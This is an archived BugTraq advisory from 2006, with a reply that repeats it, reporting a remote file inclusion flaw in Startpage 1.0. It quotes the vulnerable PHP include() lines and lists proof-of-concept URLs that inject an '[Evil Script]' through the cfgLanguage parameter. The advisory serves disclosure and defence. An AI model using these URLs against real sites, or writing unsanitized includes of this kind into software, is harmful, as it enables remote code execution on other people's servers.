BugTraq
Back to list
|
Post reply
Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability
Aug 10 2006 08:53PM
sh3ll sh3ll ir
(1 replies)
------------------------------------------------------------------------
--------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
------------------------------------------------------------------------
--------------------
Author : Sh3ll
Date : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
------------------------------------------------------------------------
--------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
version : 1.0
Venedor : http://matthijs.draijer.org
Class : Remote File Inclusion
Risk : High
Summary :
Startpage v1.0 Is a Script Which Shows Your Favortie Links.
------------------------------------------------------------------------
--------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists Is in The edit.php , functions.php , new.php PageBottom.php & PageTop.php
When Used The Variable $cfgLanguage in a include() Function Without Being Declared.
----------------------------------------edit.php------------------------
--------------------
...
<?php
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------functions.php-------------------
--------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------new.php-------------------------
--------------------
...
<?php
include ("config.php");
include ("functions.php");
include ("PageTop.php");
include ("language_$cfgLanguage.php");
connect_db();
?>
...
----------------------------------------PageBottom.php------------------
--------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------PageTop.php---------------------
--------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
------------------------------------------------------------------------
--------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]
Solution:
~~~~~~~~
Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php
& PageTop.php
------------------------------------------------------------------------
--------------------
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
------------------------------------------------------------------------
--------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
[ reply ]
Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability
Aug 13 2006 12:31PM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
--------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
------------------------------------------------------------------------
--------------------
Author : Sh3ll
Date : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
------------------------------------------------------------------------
--------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
version : 1.0
Venedor : http://matthijs.draijer.org
Class : Remote File Inclusion
Risk : High
Summary :
Startpage v1.0 Is a Script Which Shows Your Favortie Links.
------------------------------------------------------------------------
--------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists Is in The edit.php , functions.php , new.php PageBottom.php & PageTop.php
When Used The Variable $cfgLanguage in a include() Function Without Being Declared.
----------------------------------------edit.php------------------------
--------------------
...
<?php
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------functions.php-------------------
--------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------new.php-------------------------
--------------------
...
<?php
include ("config.php");
include ("functions.php");
include ("PageTop.php");
include ("language_$cfgLanguage.php");
connect_db();
?>
...
----------------------------------------PageBottom.php------------------
--------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------PageTop.php---------------------
--------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
------------------------------------------------------------------------
--------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]
Solution:
~~~~~~~~
Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php
& PageTop.php
------------------------------------------------------------------------
--------------------
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
------------------------------------------------------------------------
--------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
[ reply ]